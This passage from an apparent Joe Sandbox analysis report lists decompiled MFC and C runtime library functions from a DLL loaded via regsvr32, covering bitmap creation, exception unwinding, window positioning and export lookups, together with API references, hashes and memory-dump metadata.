								__imp__CoTaskMemFree( *(_t254 - 0x88));
							}
							L45:
						} else {
						}
					}
				}
				return E6DA5C8F9(_t192, 0, _t253);
			}

0x6da53277
0x6da53277
0x6da53281
0x6da53286
0x6da5328b
0x6da53296
0x6da5329c
0x6da533e4
0x6da533e7
0x6da533e9
0x6da53402
0x6da53405
0x6da53407
0x6da53418
0x6da5341d
0x6da5342c
0x6da5342f
0x6da53432
0x6da53439
0x6da5343c
0x6da53443
0x6da53448
0x6da5344b
0x6da53458
0x6da5345f
0x6da53462
0x6da53469
0x6da5346c
0x6da53479
0x6da5347b
0x6da5347d
0x6da5349c
0x6da534a2
0x6da534a8
0x6da534b2
0x6da534b8
0x6da534be
0x6da534c4
0x6da534c7
0x6da534ca
0x6da534cc
0x6da534d2
0x6da534ee
0x6da534f1
0x6da534f7
0x6da534fa
0x6da534fd
0x6da53500
0x6da53506
0x00000000
0x6da534d4
0x6da534d4
0x6da534da
0x6da534da
0x00000000
0x6da5347f
0x6da5347f
0x6da53485
0x6da53488
0x6da5347d
0x6da533eb
0x6da533eb
0x6da532a2
0x6da532a2
0x6da532b1
0x6da532b6
0x6da532bc
0x6da532c2
0x6da532ca
0x6da532cb
0x6da532d0
0x6da532d5
0x6da532d7
0x6da532dd
0x6da532de
0x6da532e3
0x6da532e8
0x6da532ee
0x6da532f0
0x6da532fc
0x6da532fc
0x6da53304
0x6da53307
0x6da5330d
0x6da5330d
0x6da53310
0x6da53316
0x6da53316
0x6da53323
0x6da53331
0x6da53331
0x6da53325
0x6da5332a
0x6da5332a
0x6da53333
0x6da53336
0x6da5333c
0x6da5333f
0x6da53342
0x6da53346
0x6da53348
0x6da5334d
0x6da5334d
0x6da53354
0x6da5335a
0x6da5335c
0x6da5336d
0x6da5336d
0x6da5335e
0x6da53366
0x6da53366
0x6da53372
0x6da53375
0x6da53379
0x6da53384
0x6da5338a
0x6da5338d
0x6da53395
0x6da533a1
0x6da533a5
0x6da533ad
0x6da533af
0x6da533b2
0x6da533b7
0x6da533b9
0x6da533b9
0x6da533c7
0x6da533d2
0x6da533da
0x6da53509
0x6da53509
0x6da5350c
0x6da5350f
0x6da53511
0x6da53511
0x6da53513
0x6da53515
0x6da5351b
0x6da5351e
0x6da53521
0x6da53523
0x6da53530
0x6da53530
0x6da53525
0x6da53529
0x6da53529
0x6da53532
0x6da53539
0x6da5353c
0x6da53543
0x6da53546
0x6da53546
0x6da53513
0x6da5354b
0x6da53551
0x6da53553
0x6da53555
0x6da53558
0x6da5355f
0x6da53560
0x6da53569
0x6da5356c
0x6da53574
0x6da53576
0x6da53579
0x6da5357c
0x6da5357e
0x00000000
0x00000000
0x6da53585
0x6da53592
0x6da535a0
0x6da535a3
0x6da535a6
0x00000000
0x00000000
0x6da53582
0x6da535a8
0x6da535aa
0x6da535af
0x6da535b1
0x6da535b3
0x6da535b9
0x6da535b9
0x6da535bc
0x6da535bf
0x6da535bf
0x6da535bf
0x6da535c2
0x00000000
0x6da53571
0x00000000
0x6da535c2
0x6da53574
0x6da535c4
0x6da535ca
0x6da535ca
0x6da535d0
0x6da53397
0x6da53397
0x6da53395
0x6da532bc
0x6da535db

APIs

__EH_prolog3_GS.LIBCMT ref: 6DA53281
CoTaskMemAlloc.OLE32(?), ref: 6DA533A5
CoTaskMemFree.OLE32(?), ref: 6DA535CA

Strings

, xrefs: 6DA53462

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Task$AllocFreeH_prolog3_
String ID:
API String ID: 1458175711-3916222277
Opcode ID: d2ae90d142f5b80dc85e532656abdaa40e76cb4a1714fa22e8a4ff3f117a484f
Instruction ID: 41e4d851aa8a65adf90e0884ab602c4c344422d9e6b0c78583bd063f96b4d307
Opcode Fuzzy Hash: d2ae90d142f5b80dc85e532656abdaa40e76cb4a1714fa22e8a4ff3f117a484f
Instruction Fuzzy Hash: 06C13974A08708DFCB24CFA8C984AADB7F5BF88304F248A5DE156DB251DB71A995CF10

Uniqueness

Uniqueness Score: -1.00%

Function 6DA3DC10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E6DA3DC10(void* __edx) {
				signed int _v8;
				void _v136;
				int _v140;
				int _v144;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t21;
				unsigned int _t23;
				char* _t35;
				struct HBITMAP__* _t37;
				unsigned int _t40;
				signed short _t42;
				intOrPtr _t46;
				int _t47;
				unsigned int _t49;
				void* _t52;
				signed char* _t53;
				signed int _t58;
				intOrPtr _t59;
				signed int _t62;
				void* _t63;
				intOrPtr _t64;
				signed int _t66;
				signed int _t68;

				_t52 = __edx;
				_t66 = _t68;
				_t21 =  *0x6da82744; // 0x616b45bb
				_v8 = _t21 ^ _t66;
				_t23 = GetMenuCheckMarkDimensions();
				_t47 = _t23;
				_t40 = _t23 >> 0x10;
				_v144 = _t47;
				_v140 = _t40;
				if(_t47 <= 4 || _t40 <= 5) {
					E6DA44898(_t47);
				}
				if(_t47 > 0x20) {
					_t47 = 0x20;
					_v144 = _t47;
				}
				asm("cdq");
				_t62 = _t47 + 0xf >> 4;
				_t58 = (_t47 - 4 - _t52 >> 1) + (_t62 << 4) - _t47;
				if(_t58 > 0xc) {
					_t58 = 0xc;
				}
				if(_t40 > 0x20) {
					_t40 = 0x20;
					_v140 = _t40;
				}
				E6DA5C5A0(_t58,  &_v136, 0xff, 0x80);
				_t35 = _t66 + (_t40 - 6 >> 1) * _t62 * 2 - 0x84;
				_t53 = 0x6da71c08;
				_t63 = _t62 + _t62;
				_v148 = 5;
				do {
					_t42 = ( *_t53 & 0x000000ff) << _t58;
					_t53 =  &(_t53[1]);
					_t49 =  !_t42 & 0x0000ffff;
					 *_t35 = _t49 >> 8;
					 *(_t35 + 1) = _t49;
					_t35 = _t35 + _t63;
					_t15 =  &_v148;
					 *_t15 = _v148 - 1;
				} while ( *_t15 != 0);
				_t37 = CreateBitmap(_v144, _v140, 1, 1,  &_v136);
				_pop(_t59);
				_pop(_t64);
				 *0x6da85b28 = _t37;
				_pop(_t46);
				if(_t37 == 0) {
					 *0x6da85b28 = _t37;
				}
				return E6DA59DE2(_t37, _t46, _v8 ^ _t66, _t53, _t59, _t64);
			}

0x6da3dc10
0x6da3dc13
0x6da3dc1b
0x6da3dc22
0x6da3dc28
0x6da3dc2e
0x6da3dc37
0x6da3dc3a
0x6da3dc40
0x6da3dc46
0x6da3dc4d
0x6da3dc4d
0x6da3dc55
0x6da3dc59
0x6da3dc5a
0x6da3dc5a
0x6da3dc63
0x6da3dc69
0x6da3dc77
0x6da3dc7c
0x6da3dc80
0x6da3dc80
0x6da3dc84
0x6da3dc88
0x6da3dc89
0x6da3dc89
0x6da3dca0
0x6da3dcb0
0x6da3dcb7
0x6da3dcbc
0x6da3dcbe
0x6da3dcc8
0x6da3dcce
0x6da3dcd1
0x6da3dcd5
0x6da3dcdd
0x6da3dcdf
0x6da3dce2
0x6da3dce4
0x6da3dce4
0x6da3dce4
0x6da3dd03
0x6da3dd09
0x6da3dd0a
0x6da3dd0b
0x6da3dd10
0x6da3dd13
0x6da3dd21
0x6da3dd21
0x6da3dd31

APIs

GetMenuCheckMarkDimensions.USER32 ref: 6DA3DC28
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 6DA3DD03
LoadBitmapA.USER32 ref: 6DA3DD1B

Strings

, xrefs: 6DA3DC81

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
String ID:
API String ID: 2596413745-3916222277
Opcode ID: c68cd95b70f5215095644a47291997aeef48e2001fbe55a81f01ecb3aae2c670
Instruction ID: 1a2d419465c5b0e8bb9c83a45a66e68ac0bc580d92e8514acf4d0d15f6eadaae
Opcode Fuzzy Hash: c68cd95b70f5215095644a47291997aeef48e2001fbe55a81f01ecb3aae2c670
Instruction Fuzzy Hash: B8313875A08325DBDF208F288D84BA87BB5FB85310F4680A6E549E7280DB718986CF10

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5EE55 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 28%

			E6DA5EE55(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E6DA5EDC3(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E6DA59A35(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E6DA5E840(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E6DA5EAA8(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
				if(_t20 != 0) {
					E6DA599FC(_t20, _t27);
					return _t20;
				}
				return _t20;
			}

0x6da5ee55
0x6da5ee55
0x6da5ee55
0x6da5ee55
0x6da5ee55
0x6da5ee5a
0x6da5ee5e
0x6da5ee60
0x6da5ee63
0x6da5ee64
0x6da5ee65
0x6da5ee68
0x6da5ee6d
0x6da5ee6d
0x6da5ee70
0x6da5ee74
0x6da5ee77
0x6da5ee7c
0x6da5ee79
0x6da5ee79
0x6da5ee79
0x6da5ee7f
0x6da5ee84
0x6da5ee86
0x6da5ee89
0x6da5ee8c
0x6da5ee8d
0x6da5ee95
0x6da5ee9a
0x6da5ee9e
0x6da5eea1
0x6da5eea4
0x6da5eeaa
0x6da5eeab
0x6da5eeae
0x6da5eeb8
0x6da5eebc
0x00000000
0x6da5eebc
0x6da5eec2

APIs

___BuildCatchObject.LIBCMT ref: 6DA5EE68

Part of subcall function 6DA5EDC3: ___BuildCatchObjectHelper.LIBCMT ref: 6DA5EDF9

_UnwindNestedFrames.LIBCMT ref: 6DA5EE7F
___FrameUnwindToState.LIBCMT ref: 6DA5EE8D

Strings

csm, xrefs: 6DA5EE64, 6DA5EE79, 6DA5EE8C, 6DA5EEAA, 6DA5EEBA

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: 5270a0baf611dd625da41cd82674b6083c8410e209ef2731a97e7b746eb9e4b4
Instruction ID: 2b4130df3851df4b2c9d7bfa8655f9bc70702ee6803e7f360891aed4c31e0376
Opcode Fuzzy Hash: 5270a0baf611dd625da41cd82674b6083c8410e209ef2731a97e7b746eb9e4b4
Instruction Fuzzy Hash: 2C01E47601820ABBDF025F61CD44EAB7E6AEF08354F058410BE1C95120D7329AB1DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4A8E4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 54%

			E6DA4A8E4(intOrPtr _a4) {
				signed int _v8;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t6;
				struct HINSTANCE__* _t9;
				intOrPtr _t11;
				intOrPtr _t15;
				CHAR* _t16;
				CHAR* _t17;
				signed int _t18;

				_t6 =  *0x6da82744; // 0x616b45bb
				_v8 = _t6 ^ _t18;
				_t11 = _a4;
				_t17 = "mfcm90.dll";
				_t16 =  &_v20;
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_t9 = GetModuleHandleA( &_v20);
				if(_t9 != 0) {
					_t9 = GetProcAddress(_t9, "AfxmReleaseManagedReferences");
					if(_t9 != 0) {
						_t9 = _t9->i(_t11);
					}
				}
				return E6DA59DE2(_t9, _t11, _v8 ^ _t18, _t15, _t16, _t17);
			}

0x6da4a8ec
0x6da4a8f3
0x6da4a8f7
0x6da4a8fc
0x6da4a901
0x6da4a904
0x6da4a905
0x6da4a906
0x6da4a90c
0x6da4a90d
0x6da4a915
0x6da4a91d
0x6da4a925
0x6da4a928
0x6da4a92a
0x6da4a925
0x6da4a939

APIs

GetModuleHandleA.KERNEL32(?), ref: 6DA4A90D
GetProcAddress.KERNEL32(00000000,AfxmReleaseManagedReferences), ref: 6DA4A91D

Strings

mfcm90.dll, xrefs: 6DA4A8FC
AfxmReleaseManagedReferences, xrefs: 6DA4A917

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: AfxmReleaseManagedReferences$mfcm90.dll
API String ID: 1646373207-1752160237
Opcode ID: ec2aab4c801c52df5cd0f2cb493c869bd68b4b23aead99e0b7ac2a0b8f384acc
Instruction ID: b15a2a1087e5cdaca8db09fa1e2d22ae043a4e2a0e6aa5bd06bf54d881b4e26b
Opcode Fuzzy Hash: ec2aab4c801c52df5cd0f2cb493c869bd68b4b23aead99e0b7ac2a0b8f384acc
Instruction Fuzzy Hash: 70F0E9B7608309AB8B00EF668D44EBF77BCFF8A611701482DE952D7101CF70D50186A0

Uniqueness

Uniqueness Score: -1.00%

Function 6DA60767 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E6DA60767() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x6da74c20;
					_v28 =  *0x6da74c18;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x6da6076c
0x6da60774
0x6da6078b
0x6da60737
0x6da60740
0x6da6074c
0x6da6074f
0x6da60752
0x6da60754
0x6da60757
0x6da6075c
0x6da60766
0x6da6075e
0x6da60762
0x6da60762
0x6da60776
0x6da6077c
0x6da60784
0x00000000
0x6da60786
0x6da60786
0x6da6078a
0x6da6078a
0x6da60784

APIs

GetModuleHandleA.KERNEL32(KERNEL32,6DA59E60), ref: 6DA6076C
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6DA6077C

Strings

KERNEL32, xrefs: 6DA60767
IsProcessorFeaturePresent, xrefs: 6DA60776

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 99baf7e221f166b4072c6f42c738f1f06507ff9ce844cbb90dc3f0b8da3e9b7e
Instruction ID: 6cc894f8ace16bbd62cfd3ba788f4882c97d266a8a095ffab7abddccbd099f4c
Opcode Fuzzy Hash: 99baf7e221f166b4072c6f42c738f1f06507ff9ce844cbb90dc3f0b8da3e9b7e
Instruction Fuzzy Hash: 84F05435908A1AD6EF001BA6AE4976F7A78FF86742F824594D5D1E0084DF7180F1C6AA

Uniqueness

Uniqueness Score: -1.00%

Function 6DA53D19 Relevance: 6.2, APIs: 4, Instructions: 174
windowCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E6DA53D19(intOrPtr* __ecx, void* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				intOrPtr* _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t59;
				intOrPtr* _t60;
				intOrPtr _t61;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr* _t90;
				void* _t133;
				void* _t136;
				intOrPtr* _t137;
				intOrPtr* _t138;
				intOrPtr* _t139;
				intOrPtr* _t141;
				void* _t142;

				_t133 = __edx;
				_t116 = __ecx;
				_t141 = __ecx;
				_t59 =  *((intOrPtr*)(__ecx + 4));
				if(_t59 == 0) {
					L1:
					_t59 = E6DA44898(_t116);
				}
				_t60 =  *((intOrPtr*)(_t59 + 0x28));
				if(_t60 == 0) {
					goto L1;
				}
				_t116 = _t60;
				_t61 = E6DA41A05(_t60, _t136);
				_v8 = _t61;
				if(_t61 == 0) {
					goto L1;
				}
				_t62 = IsWindowVisible( *(_t61 + 0x20));
				asm("sbb eax, eax");
				_t64 =  ~_t62 + 1;
				_v24 = _t64;
				if(_t64 != 0) {
					GetWindowRect( *(E6DA405F2(0, _t116, GetDesktopWindow()) + 0x20),  &_v56);
					GetWindowRect( *(_v8 + 0x20),  &_v40);
					asm("cdq");
					asm("cdq");
					E6DA4363B(_v8, _v56.right - _v56.left - _t133 >> 1, _v56.bottom - _v56.top - _t133 >> 1, 0, 0, 0);
					E6DA4367B(_v8, 1);
				}
				_t66 =  *((intOrPtr*)( *((intOrPtr*)(_t141 + 4)) + 0x50));
				_t137 = _t141 + 0x48;
				_push(_t137);
				_push(0x6da73b38);
				_push(_t66);
				if( *((intOrPtr*)( *_t66))() >= 0) {
					_t90 =  *_t137;
					_t139 = _t141 + 0x4c;
					_v12 =  *((intOrPtr*)( *_t90 + 0xc))(_t90, 0, 0x6da79438, _t139);
					if( *_t139 == 0) {
						_v12 = 0x80004003;
					}
					if(_v12 >= 0) {
						L18:
						_t142 = E6DA53277(0, _t141, _t139, _t141, __eflags);
						__eflags = _v24;
						if(_v24 != 0) {
							__eflags = _v40.right - _v40.left;
							E6DA4363B(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
							E6DA4367B(_v8, 0);
						}
						return _t142;
					} else {
						if(_v24 != 0) {
							E6DA4363B(_v8, _v40.left, _v40.top, _v40.right - _v40.left, _v40.bottom - _v40.top, 0);
							E6DA4367B(_v8, 0);
						}
						return _v12;
					}
				}
				_t69 =  *((intOrPtr*)( *((intOrPtr*)(_t141 + 4)) + 0x50));
				_t70 =  *((intOrPtr*)( *_t69))(_t69, 0x6da73b90,  &_v16);
				__eflags = _t70;
				if(_t70 >= 0) {
					_t71 = _v16;
					 *((intOrPtr*)( *_t71 + 0x14))(_t71,  &_v20);
					_t73 = _v16;
					 *((intOrPtr*)( *_t73 + 8))(_t73);
					_t75 = _v20;
					__eflags = _t75;
					if(_t75 == 0) {
						return 0x80004005;
					}
					_t138 = _t141 + 8;
					_v12 =  *((intOrPtr*)( *_t75))(_t75, 0x6da79218, _t138);
					_t77 = _v20;
					 *((intOrPtr*)( *_t77 + 8))(_t77);
					_t70 = _v12;
					__eflags = _t70;
					if(__eflags >= 0) {
						_t139 =  *_t138;
						 *((intOrPtr*)( *_t139))(_t139, 0x6da79228, _t141 + 0xc);
						goto L18;
					}
				}
				return _t70;
			}

0x6da53d19
0x6da53d19
0x6da53d23
0x6da53d25
0x6da53d2d
0x6da53d2f
0x6da53d2f
0x6da53d2f
0x6da53d34
0x6da53d39
0x00000000
0x00000000
0x6da53d3b
0x6da53d3d
0x6da53d42
0x6da53d47
0x00000000
0x00000000
0x6da53d4c
0x6da53d54
0x6da53d56
0x6da53d57
0x6da53d5a
0x6da53d75
0x6da53d81
0x6da53d8c
0x6da53d9b
0x6da53da1
0x6da53dab
0x6da53dab
0x6da53db3
0x6da53db8
0x6da53dbb
0x6da53dbc
0x6da53dc1
0x6da53dc6
0x6da53dc8
0x6da53dcc
0x6da53dda
0x6da53ddf
0x6da53de1
0x6da53de1
0x6da53deb
0x6da53e95
0x6da53e9c
0x6da53e9e
0x6da53ea1
0x6da53eb1
0x6da53ebb
0x6da53ec4
0x6da53ec4
0x00000000
0x6da53df1
0x6da53df4
0x6da53e0e
0x6da53e17
0x6da53e17
0x00000000
0x6da53e1c
0x6da53deb
0x6da53e27
0x6da53e36
0x6da53e38
0x6da53e3a
0x6da53e40
0x6da53e4a
0x6da53e4d
0x6da53e53
0x6da53e56
0x6da53e59
0x6da53e5b
0x00000000
0x6da53e5d
0x6da53e66
0x6da53e72
0x6da53e75
0x6da53e7b
0x6da53e7e
0x6da53e81
0x6da53e83
0x6da53e85
0x6da53e93
0x00000000
0x6da53e93
0x6da53e83
0x6da53ecf

APIs

IsWindowVisible.USER32(?), ref: 6DA53D4C
GetDesktopWindow.USER32 ref: 6DA53D5C
GetWindowRect.USER32 ref: 6DA53D75
GetWindowRect.USER32 ref: 6DA53D81

Part of subcall function 6DA44898: __CxxThrowException@8.LIBCMT ref: 6DA448AE

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Window$Rect$DesktopException@8ThrowVisible
String ID:
API String ID: 719863476-0
Opcode ID: 750599e8a50e325773fc67e938e1712905c4372590a345b607d1ef5962b49afe
Instruction ID: 09f032ada3178c7cba8df5e4c6ee2ee872ed7731f5925c70af50294907c19a12
Opcode Fuzzy Hash: 750599e8a50e325773fc67e938e1712905c4372590a345b607d1ef5962b49afe
Instruction Fuzzy Hash: B151ED76A0451AEFDB04DFE8CA84CAEB7B9FF89304B154858F646E7250C731AD51CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4E579 Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6DA4E579(intOrPtr __ecx, signed int _a4) {
				intOrPtr _v8;
				struct HWND__* _v12;
				struct HWND__* _v16;
				struct HWND__* _v20;
				signed int _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t52;
				struct HWND__* _t55;
				intOrPtr _t56;
				struct HWND__* _t59;
				struct HWND__* _t60;
				int _t61;
				struct HWND__* _t67;
				struct HWND__* _t69;
				struct HWND__* _t70;
				struct HWND__* _t71;
				intOrPtr _t79;
				struct HWND__* _t81;
				signed int _t83;
				void* _t90;
				intOrPtr _t95;
				signed int _t96;
				signed int _t99;
				struct HWND__** _t101;

				_t96 = _a4;
				_t79 = __ecx;
				_v8 = __ecx;
				if(_t96 == 0) {
					return 0;
				}
				_t52 =  *(__ecx + 0x44);
				_a4 = 0;
				_v16 = _t52;
				_v20 = _t52;
				__eflags = _t52;
				if(_t52 != 0) {
					_a4 =  *(E6DA3E977( &_v16));
				}
				_t83 = 0;
				_v12 = 0;
				_v24 = 0;
				__eflags =  *(_t96 + 8);
				if( *(_t96 + 8) <= 0) {
					L32:
					__eflags = 1;
					return 1;
				} else {
					do {
						_t55 = _a4;
						__eflags = _t55;
						if(_t55 == 0) {
							L13:
							_t56 =  *((intOrPtr*)(_t96 + 0xc));
							_t99 = _t83 << 3;
							__eflags =  *(_t99 + _t56);
							if( *(_t99 + _t56) == 0) {
								goto L31;
							}
							__eflags = _v12;
							if(_v12 != 0) {
								_push(2);
								_push(_v12);
							} else {
								_t81 =  *(_t79 + 0x20);
								__eflags = _t81;
								if(_t81 != 0) {
									_t81 =  *(_t81 + 0x20);
								}
								_push(5);
								_push(_t81);
							}
							_t59 = E6DA4DAA7( *( *((intOrPtr*)(_t96 + 0xc)) + _t99), GetWindow());
							_t80 = _t59;
							__eflags = _t59;
							if(__eflags == 0) {
								_t67 =  *(_v8 + 0x20);
								__eflags = _t67;
								if(__eflags != 0) {
									_t67 =  *(_t67 + 0x20);
								}
								_t80 = GetDlgItem(_t67,  *( *((intOrPtr*)(_t96 + 0xc)) + _t99));
							}
							_t60 = E6DA3D6AF(__eflags, 0xc);
							__eflags = _t60;
							if(_t60 == 0) {
								_t101 = 0;
								__eflags = 0;
							} else {
								_t101 = E6DA4D86A(_t60, _t80,  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0xc)) + _t99 + 4)));
							}
							_t61 = IsWindow( *_t101);
							__eflags = _t61;
							if(_t61 != 0) {
								_t90 = _v8 + 0x40;
								__eflags = _v20;
								_v12 =  *_t101;
								_push(_t101);
								if(__eflags == 0) {
									E6DA4DC36(_t80, _t90, _t96, _t101, __eflags);
								} else {
									_push(_v20);
									E6DA4DC6E(_t80, _t90, _t96, _t101, __eflags);
								}
							}
							_t79 = _v8;
							goto L31;
						}
						_t69 =  *(_t55 + 4);
						__eflags = _t69;
						if(_t69 == 0) {
							goto L13;
						}
						_t95 =  *((intOrPtr*)(_t96 + 0xc));
						__eflags =  *((intOrPtr*)(_t69 + 0x2c)) -  *((intOrPtr*)(_t95 + _t83 * 8));
						if( *((intOrPtr*)(_t69 + 0x2c)) !=  *((intOrPtr*)(_t95 + _t83 * 8))) {
							goto L13;
						}
						_t70 =  *(_t69 + 0x24);
						__eflags = _t70;
						if(_t70 != 0) {
							_v12 = _t70;
						}
						_t71 = _v16;
						_v20 = _t71;
						__eflags = _t71;
						if(_t71 == 0) {
							_a4 = _a4 & 0x00000000;
						} else {
							_a4 =  *(E6DA3E977( &_v16));
						}
						L31:
						_t83 = _v24 + 1;
